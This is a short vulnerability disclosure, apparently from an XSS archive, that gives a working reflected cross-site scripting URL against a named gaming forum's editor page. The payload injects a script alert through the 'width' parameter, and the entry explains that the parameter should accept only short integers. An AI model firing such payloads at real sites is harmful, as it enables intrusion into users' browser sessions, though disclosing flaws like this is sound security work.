Type: Non-persistent
Criteria: None
http://bbs.ijji.com/bbsEditor.nhn?width=570,370%29;alert%28/xss/.source%29;//&themeName=black
Note that the exploit will execute twice under Internet Explorer.
The vulnerability lies entirely within the variable width, which should only accept integer values, and of a restricted size (2-4 digits).
This exploit has been updated
Advertisement
